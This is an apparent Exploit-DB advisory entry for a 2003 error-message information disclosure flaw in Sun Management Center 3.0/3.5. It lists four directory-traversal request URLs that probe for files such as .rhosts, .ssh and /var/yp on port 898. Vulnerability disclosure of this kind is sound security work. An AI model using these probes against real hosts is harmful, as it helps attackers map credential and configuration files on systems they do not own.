Sun Management Center 3.0/3.5 - Error Message Information Disclosure

EDB-ID:

23272

CVE:

N/A


Author:

Jon Hart

Type:

remote


Platform:

Solaris

Date:

2003-10-22


source: https://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts. 

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.